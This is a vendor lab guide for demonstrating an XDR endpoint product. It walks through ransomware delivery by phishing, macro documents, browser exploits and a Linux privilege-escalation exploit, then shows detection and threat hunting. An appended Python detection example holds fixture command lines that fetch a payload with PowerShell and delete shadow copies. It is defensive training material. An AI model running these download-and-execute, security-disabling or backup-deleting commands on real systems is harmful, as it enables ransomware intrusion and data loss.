
XDR Demo Lab Guide

Dan Blankenship – 2019

Table of Contents

Accessing the Lab Environment: 3

Demo Outline: 7

Part 1: Compromising the Victim Host
Phishing Attack: 8
Malicious Word Document: 12
Malicious link on a website: 15
Direct Execution of Malware: 17

Part 2: Attempting to compromise a host protected by XDR, and preventing the attack
Phishing attack on protected VM: 20
Malicious Word document on protected VM: 21
Malicious link in a website on protected VM: 22
Direct Execution of malware (.exe) on protected VM: 23
Script-based Attack (Behavioral Threat Prevention): 24
Linux Privilege Escalation Exploit: 26

Part 3: Viewing the prevention events and related information in the XDR Console
View prevention events: 33
Reporting: 37

Part 4 – Viewing an Incident in XDR and determining causality
Generating Data: 40
Access the XDR console: 42
Navigating the XDR console: 42
Analyzing the event: 44

Part 5 – Threat Hunting in XDR
Threat hunting with Queries: 48

Accessing the Lab environment:
Go to http://tms.panwlabs.net and follow the on-screen prompts:

The Passphrase is: GoPaloAltoNetworks

If you experience any issues logging in to the lab, or for general support
questions, please contact:
panwlabs-help@paloaltonetworks

After entering this and your contact information you will receive a series of emails:

One confirming your request:

And a second once the environment has booted, which contains the URL and credentials to access the lab:

Once logged in to Palo Alto Networks Lab you will arrive at a landing page showing you the virtual
machines in the environment you can interact with:

The VMs available are:

Hostname    Description                                               Username        Password
Victim      Windows 7 host without XDR agent installed                Administrator   Password1!
Protected   Windows 7 host with XDR agent installed and enabled       Administrator   Password1!
Ubuntu      Linux host with an XDR agent installed and enabled        victim          Password1!
Kali        Kali Linux box, used as the “attacker” host               root            toor

Management UI addresses:
***XDR Console should be viewed in an incognito/private browser window on your workstation***

Application   URL                            Username                    Password
XDR           http://xdrdemolab.com/xdr      demouser@xdrdemolab.com     Password1!

You can right-click and select “open link in new tab” to access multiple VMs simultaneously. Open VMs
will be displayed in the “Recent Connections” panel:

These VMs’ XDR agents are managed by the XDR console. The tenant used for this lab can be accessed
at:

http://xdrdemolab.com/xdr with the login credentials:

Username: demouser@xdrdemolab.com

Password: Password1!

The prepared demonstration consists of 5 parts:

1. Compromising an unprotected host
2. Attempting to compromise a host protected by XDR, and preventing the attack
3. Viewing the prevention events and related information in the XDR console
4. Researching the events & incidents in XDR
5. Threat hunting in XDR

All of these VMs will be used in the demonstration, but we will start by clicking the “Victim” machine’s
tab to begin.

Part 1 - Compromising an unprotected host

You will be presented with a Windows login screen:

Log in as administrator using the password “Password1!”.

Once logged in you will see several files and shortcuts on the desktop:

These will allow you to demonstrate different ways to compromise this virtual machine. The methods
available are:

Phishing emails
Malicious Word document
Malicious link in a website
Direct Execution of malware (.exe)

In this demonstration, all of these attacks, if successful, will have the same result: execution of
ransomware on the victim. This means that you can only demonstrate one of these attack methods
before the victim machine is compromised, because the result is drive encryption.

Below are instructions to demonstrate each attack:

Phishing attack:

Open Microsoft Outlook with the shortcut on the desktop.

The inbox will contain 2 phishing emails. One disguising itself as an ad for cellular discounts, and
the other masquerading as a Google account security alert.

Clicking any of the links in either of these emails will take you to the respective bogus website,
hosted by our attacker. The sites will load a browser exploit and if successful it will deliver and
execute a ransomware payload.

It is always possible that the exploit will not succeed, and nothing will happen. If this occurs,
simply close the browser window, open email again, and click the malicious link again.

If successful, after a few moments the ransomware will encrypt images, documents, and other
personal files on the machine, and present a pop-up demanding payment to decrypt them.

Malicious Word document:

Open the invoice.docm file on the desktop.

The document is designed to appear encrypted. It is designed to trick the user into clicking
“Enable Content” to ‘decrypt’ the document. In reality, this bit of social engineering is designed
to trick the user into running the malicious VBA macro in the document, which will use
PowerShell to download and execute the ransomware payload.

Click the “Enable Content” button in the top of the window.

After enabling the content, the macro will auto-run. The document will appear to “decrypt” and
the ransomware payload will be run in the background.

If successful, after a few moments the ransomware will encrypt images, documents, and other
personal files on the machine, and present a pop-up demanding payment to decrypt them.

Malicious link in a website:

Open the “Exploit Tests” shortcut on the desktop

Afterwards a webpage will open with 3 buttons:

“Exploit and print system message”: This will exploit the browser and execute a benign
payload. This is used primarily for testing and is not part of the demo.
“Exploit and deliver crypto malware”: This will exploit the browser and execute a
version of Cryptowall, encrypting portions of the VM’s drive and displaying a ransom
message.

“Download malware directly”: This will allow you to download the Cryptowall
executable directly without exploiting the browser. This will be addressed in the next
section.

For this demonstration, click “Exploit and deliver crypto malware”. This simulates clicking a
malicious link in a trusted website.

If successful, the browser window will disappear and you will see the ransom message pop up
shortly afterwards.

It is always possible that the exploit will not succeed, and nothing will happen. If this occurs,
simply close the browser window, open the shortcut again, and click “Exploit and deliver crypto
malware” again.

Direct Execution of malware (.exe):

Open the “Exploit Tests” shortcut on the desktop

Afterwards a webpage will open with 3 buttons:

“Exploit and print system message”: This will exploit the browser and execute a benign
payload. This is used primarily for testing and is not part of the demo.

“Exploit and deliver crypto malware”: This will exploit the browser and execute a
version of Cryptowall, encrypting portions of the VM’s drive and displaying a ransom
message.
“Download malware directly”: This will allow you to download the Cryptowall
executable directly without exploiting the browser.

For this demonstration, click “Download crypto malware directly”. This attack involves no
exploit whatsoever, because the user is directly executing the malware. Save the file to the
Desktop and double click it.

If successful, after a few moments the ransomware will encrypt images, documents, and other personal
files on the machine, and present a pop-up demanding payment to decrypt them.

Now that you have shown any number of ways a host can be compromised, you should proceed to:

Part 2 - Attempting to compromise a host protected by XDR, and preventing the attack

Open the “Protected” machine from the connections page. You will be presented with a Windows login
screen:

Log in as administrator using the password “Password1!”.

All of the same attack methods are available on the protected machine, but an XDR agent is also
installed. Here you can demonstrate XDR’s ability to stop all of these by repeating the instructions
above.

Phishing attack on protected VM:

When you click the link in the phishing email and are taken to the bogus website, XDR will
prevent the software exploit attempt and deliver a pop-up message alerting the user. Clicking OK
will result in the termination of the Internet Explorer process.

Malicious Word document on protected VM:
When you double click the “invoice.docm” file on the desktop, XDR will identify the malicious
macro in the file and prevent Microsoft Word from loading it.

Malicious link in a website on protected VM:
When you open the “Exploit Tests” shortcut on the desktop, and click “Exploit and
deliver crypto malware”, XDR will prevent the software exploit attempt and deliver a
pop-up message alerting the user. Clicking OK will result in the termination of the
Internet Explorer process.

Direct Execution of malware (.exe) on protected VM:
When you open the “Exploit Tests” shortcut on the desktop, and click “Download crypto
malware directly”, XDR’s Local Algorithmic Analysis will identify the malicious executable and
deliver a pop-up message alerting the user. Clicking OK will result in the removal of the malicious
executable.

Script-based Attack (Behavioral Threat Prevention):
Attacks using non-malicious software (e.g. PowerShell, wscript, etc.), or “living-off-the-land” attacks,
are difficult to identify due to the benign nature of the tools the attacker uses. XDR’s Behavioral
Threat Prevention (BTP) monitors users’ actions in an effort to identify a chain of events that
indicates malicious intent from these benign tools.

Double-clicking “BTP_demo.vbs” on the desktop will initiate a series of events meant to simulate
a script-based attack. XDR will prevent the scripted actions from completing.

You can view the details of this alert in the XDR console later.

Linux Privilege Escalation Exploit:

Log in as the user “victim” on the Ubuntu VM. Please note that an XDR agent is installed on this host and
enabled.

Once logged in, open a terminal window

At the command prompt, type “./exploit”

This will attempt to execute a privilege escalation exploit that will get you root access without a
password; however, XDR will terminate the process (Note: This may close your terminal window as well).

You will not see a pop-up alert, but you can view the event in the XDR Management Service. The event
type will be “Kernel Privilege Escalation”.

Back in the Linux VM, open a new terminal window and type “./disable_XDR.sh” into the command
prompt and enter the password “Password1!”

You will see that the XDR processes have been stopped.

Next, type “./exploit” into the command prompt to attempt the exploit again, with XDR disabled.

This time it should succeed, because XDR is now disabled, and you will have access to a shell as root.
You can enter the command “whoami” to verify.

After you have prevented any or all of these attacks, you can move on to:

Part 3 - Viewing the prevention events and related information in the XDR Console
If you are not already logged in to XDR, open a web browser and go to http://xdrdemolab.com/xdr and
log in with the credentials:

Username: demouser@xdrdemolab.com

Password: Password1!
The XDR console is read-only, so you will be able to view security events and other
configurations/logs, but cannot make changes.

When you log in you will be taken to the default dashboard. The dashboard is an excellent place to view
the overall health of an enterprise, but first let's view the raw alerts you just created:

XDR combines individual, related alerts into Incidents. To view the raw prevention events we just saw
on the protected VMs you need to click on Investigation → Incidents tab, and then click the “Alerts
Table” in the top right:

In the alerts table, you should see several recent exploit preventions and WildFire/malware preventions:

The number of events you see in your XDR console will vary depending on the number of attack
preventions you demonstrated in the previous step.

The Alerts table provides an overview of each event. Right-clicking on one of these events and selecting
“Analyze” will provide more contextual information.

Memory Corruption Exploits will provide information about the username and hostname involved in the
event, the process involved, other files loaded at the time, and other sundry information:

WildFire/Local Analysis malware preventions involve Office documents or executables and, in addition to
the above information, also provide a detailed WildFire dynamic analysis report about the malicious
executable or document. This can be accessed from within the analysis card by clicking the download
icon under “WildFire Score”:

Reporting:
XDR can create scheduled and on-demand reports about security events, agent status, license usage,
and other data. To view them, click on Reporting -> Reports in the XDR console.

A report has already been run in XDR; you can view it by right-clicking the row and selecting “Download”:

This particular report summarizes the status of the XDR agents.

Part 4 – Viewing an Incident in XDR and determining Causality
XDR analyzes raw security alerts and combines them into larger incidents. This allows a user to quickly
understand how individual security events are related and reduces alert fatigue by linking seemingly
disparate events into one group.

Generating Data:

To generate interesting data to view in XDR, certain exceptions have been made to the XDR agent’s policy
to allow a ransomware attack to play out almost to fruition. Typically, a properly configured XDR agent
would prevent this type of attack, as was demonstrated earlier, but for the sake of this portion of the
demonstration we are using this partially disabled policy.

On the Protected host, open the folder on the desktop named “XDR_demo” and then open the
“your_invoice.docm” file inside the folder.

Incidentally, this is the same document used in the malicious word document example earlier in this
guide.

Because of the location of this file, the XDR agent will allow this attack to play out.

The document is designed to appear encrypted. It is designed to trick the user into clicking “Enable
Content” to ‘decrypt’ the document. In reality, this bit of social engineering is designed to trick the user
into running the malicious VBA macro in the document, which will use PowerShell to download and
execute the ransomware payload.

Click the “Enable Content” button in the top of the window.

After enabling the content, the macro will auto-run. The document will appear to “decrypt” and the
ransomware payload will be run in the background.

Again, because the policy pertaining to this document has several modules disabled, the ransomware
will be allowed to execute. XDR will eventually prevent the encryption using a behavioral ransomware
prevention module, and you will see a popup message.

You may click okay to close the alert window.

Accessing the XDR console:

Next we need to log in to XDR. If you have not already done so, open a new incognito/private web
browser on your desktop and go to http://xdrdemolab.com/xdr and log in with the credentials:

Username: demouser@xdrdemolab.com

Password: Password1!

Navigating the XDR console:

The XDR instance is read-only, so you will be able to view and filter alerts, incidents and other
configurations/logs, but cannot make changes.

Once logged in you will see the Incidents dashboard. Clicking on the open incidents widget will take you to
the incidents summary page.

From here, right click the incident you want to investigate and select “View Incident”. In this
demonstration, we triggered a ransomware payload, so find the incident related to “Process requests the
deletion of Windows shadow copies” and select “Analyze”.

Once viewing the incident, XDR I&R will collect the assets, files, IP addresses, and alerts involved in the
incident and summarize what happened.

Processes identified as malicious by WildFire will be highlighted in red, and WildFire reports about the files
can be downloaded by clicking a button to the right of the file.

Analyzing the event:

To view a flowchart of what exactly happened in the incident, right click one of the alerts and select
“Analyze”.

XDR I&R will build a flowchart showing each step of the attack and surface critical information in the
lower portion of the screen. XDR also identifies the “Causality Group Owner”, with the CGO tag (in this
example, winword.exe). This is what XDR believes to be the root cause of the incident.

If you click through the nodes of the flowchart, beginning with winword.exe, you can view the
commands that were run and better understand exactly how the attack was executed.

First, we can see that winword.exe ran a command to open “invoice.docm”.

Clicking on the second node, powershell.exe, we can see that PowerShell was used to download
something called “payload.txt” from the IP address 10.0.0.10.

Clicking on the third node, we can see that a second instance of PowerShell was passed a base64-encoded
string to execute. This type of dropper behavior is very common in malware attacks, in an attempt to
bypass the endpoint’s security.

Above several nodes in the causality chain you can see red badges. These denote that an alert (or alerts)
was triggered at this stage of the attack. Badges with the XDR agent logo indicate endpoint alerts.

Triangular badges indicate XDR BIOC alerts.

Walking through the remaining nodes will provide more information about the attack.

Several executables have been highlighted in red. Similar to the incident page, these indicate that
WildFire identified these as malicious files. This information, along with the fact that they are unsigned, is
also presented in the lower portion of the screen.

The last node in the chain is vssadmin.exe, a process signed by Microsoft that WildFire identified as
benign. However, if we look at the command run, we can see vssadmin.exe was being used to delete
Windows’ shadow copies. These are backups of the filesystem. Ransomware often does this to prevent
a compromised machine from being rolled back to a safe state.

Despite this being a benign process with a valid signature, XDR has still identified this activity as highly
suspect, which triggered an alert:

Since XDR eventually prevented the ransomware from encrypting the drive, no immediate action is
necessary at this time.

Part 5 – Threat Hunting in XDR Investigation & Response

We can also use XDR I&R to hunt for other instances of an artifact from an attack.

If we look back at the causality card from our investigation, we can see the IP address the initial payload
was downloaded from in the first PowerShell node.

Select the Query Builder from the Investigation Menu.

XDR I&R uses an easy-to-use GUI to build queries instead of a complex query language. You can search for
different types of artifact. In this case we will use a network query because we are searching for an IP
address.

After selecting Network, type the IP address 10.0.0.10 into the “Remote IP” field.

The query builder lets us search on more than one piece of data. Since we know that powershell.exe
was used to download the payload, we need to add it into the search to narrow the results. Click the “+
PROCESS” button and a new set of search fields will be presented.

In the Process Name field, type “powershell.exe”, then click the RUN button in the lower righthand
corner.

XDR I&R will search through all of the data stored in the Data Lake, identifying historic instances of the
behavior you are searching for.

From the results page we can right click and select “Analyze” to get more context.

XDR I&R will create a new causality card similar to when we were investigating an incident, but this time
will plot the data we were searching for so we can better understand what led to the connection to this
IP address.
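To make the Part 4 causality walk-through and the Part 5 hunt concrete, here is an added Python example (not part of this guide and not Cortex XDR's own code or data format) that runs over a constructed process/network record set modelled on the chain above: it walks the parent chain to find the causality group owner, decodes the base64-encoded PowerShell command, flags the shadow-copy deletion, and answers the "Remote IP plus process name" query. Pids, field names and command lines are constructed assumptions.

```python
import base64
from collections import namedtuple

# Constructed telemetry shaped like the chain in this guide; pids, field names
# and command lines are assumptions, not Cortex XDR's schema.
Proc = namedtuple("Proc", "pid ppid image cmdline signed")
Net = namedtuple("Net", "pid remote_ip remote_port")
SHELL_ROOTS = {"explorer.exe", "services.exe"}  # assumed boundary for the CGO walk
ENC = base64.b64encode("Start-Process C:\\Users\\Public\\payload.exe".encode("utf-16-le")).decode()
PROCS = [
    Proc(100, 1, "explorer.exe", "explorer.exe", True),
    Proc(200, 100, "winword.exe", 'WINWORD.EXE /n "C:\\XDR_demo\\your_invoice.docm"', True),
    Proc(300, 200, "powershell.exe", "powershell.exe -w hidden (New-Object Net.WebClient)"
         ".DownloadString('http://10.0.0.10/payload.txt')", True),
    Proc(400, 300, "powershell.exe", "powershell.exe -enc " + ENC, True),
    Proc(500, 400, "payload.exe", "C:\\Users\\Public\\payload.exe", False),
    Proc(600, 500, "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet", True),
    Proc(700, 100, "chrome.exe", "chrome.exe", True),  # unrelated browser session
]
NETS = [Net(300, "10.0.0.10", 80), Net(700, "10.0.0.10", 80)]

def by_pid(procs):
    return {p.pid: p for p in procs}

def causality_group_owner(procs, pid):
    """Walk up the parent chain; the last process before the shell is the CGO."""
    index = by_pid(procs)
    p = index[pid]
    while p.ppid in index and index[p.ppid].image.lower() not in SHELL_ROOTS:
        p = index[p.ppid]
    return p.image

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (UTF-16LE base64), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def alerts(procs):
    """Flag the behaviours the guide's causality view surfaces, tagged with the CGO."""
    index, found = by_pid(procs), []
    for p in procs:
        parent, cmd = index.get(p.ppid), p.cmdline.lower()
        if parent and parent.image == "winword.exe" and p.image == "powershell.exe":
            found.append((p.pid, "Office application spawned PowerShell"))
        if p.image == "powershell.exe" and decode_encoded_command(p.cmdline):
            found.append((p.pid, "PowerShell executed a base64-encoded command"))
        if p.image == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd:
            found.append((p.pid, "Process requests the deletion of Windows shadow copies"))
    return [(pid, causality_group_owner(procs, pid), why) for pid, why in found]

def hunt_network(procs, nets, remote_ip, process_name):
    """Part 5 style query: connections to remote_ip by process_name, with the parent image."""
    index = by_pid(procs)
    return [(n.pid, index[index[n.pid].ppid].image) for n in nets
            if n.remote_ip == remote_ip and index[n.pid].image == process_name]
```

Running alerts(PROCS) attributes every flagged pid back to winword.exe, and hunt_network(PROCS, NETS, "10.0.0.10", "powershell.exe") returns only the PowerShell connection and its Word parent, mirroring what the causality card plots.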
